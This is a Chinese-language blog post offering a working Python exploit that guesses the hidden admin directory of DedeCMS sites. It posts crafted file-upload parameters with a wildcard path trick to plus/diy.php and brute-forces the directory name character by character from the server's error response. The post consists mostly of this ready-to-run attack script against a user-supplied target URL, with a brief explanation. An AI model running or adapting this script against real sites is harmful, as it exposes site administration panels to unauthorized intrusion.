Dedecms 猜解后台EXP

工具 92 字 大概 1 分钟 301 次

效果图

2018061813043470.png

简述

  • 利用文件common.inc.php,只要包含此文件就能对后台进行猜解。
  • EXP中使用的是tags.phpplus/diy.php
  • 实际过程中可能遇到目录第一个字符无法猜解的问题,使用加强版本先爆破前两位字符即可解决。
  • 单线程猜解,速度就体谅下吧,懒得写太多了

代码

import requests

def firstcheck():
    try:
        for testi in list:
            for i in list:
                data='dopost=save&_FILES[b4dboy][tmp_name]=./../%s%s</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif'%(testi,i)
                returndata = requests.post(url=url,data=data,headers=headers,timeout=10)
                ifdata = 'Upload filetype not allow !'
                print(inurl +'/'+ testi + i,end='\r')
                if not ifdata in returndata.text:
                    print('')
                    secondcheck(testi+i)
                    i =1
                    break
            if i == 1:
                break
    except Exception as e:
        print('// Please check your url.')
        exit()

def secondcheck(testi):
    try:
        global result
        for i in list:
            data='dopost=save&_FILES[b4dboy][tmp_name]=./../%s%s</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif'%(testi,i)
            returndata = requests.post(url=url,data=data,headers=headers,timeout=10)
            ifdata = 'Upload filetype not allow !'
            if not ifdata in returndata.text:
                testi = testi + i
                result = inurl + '/' + testi
                print(result)
                secondcheck(testi)
                break
    except Exception as e:
        print('// Please check your url.')
        exit()

if __name__ == '__main__':
    global result
    list=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
    headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0','Content-Type':'application/x-www-form-urlencoded'}
    inurl = input('---------------------------------------------------\nPlease input the url that you want to use.\n\n<URL> ')
    url = inurl + '/plus/diy.php'
    print('// Start Guess')
    try:
        checkurl = requests.get(url=url,headers=headers)
        if checkurl.status_code ==200:
            firstcheck()
            print('// Guess finished!\n// The result is %s'%result)
        else:
            print('// Exploit file is not exist.')
    except Exception as e:
        print('// Please check your url.')
        exit()
文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

发表感想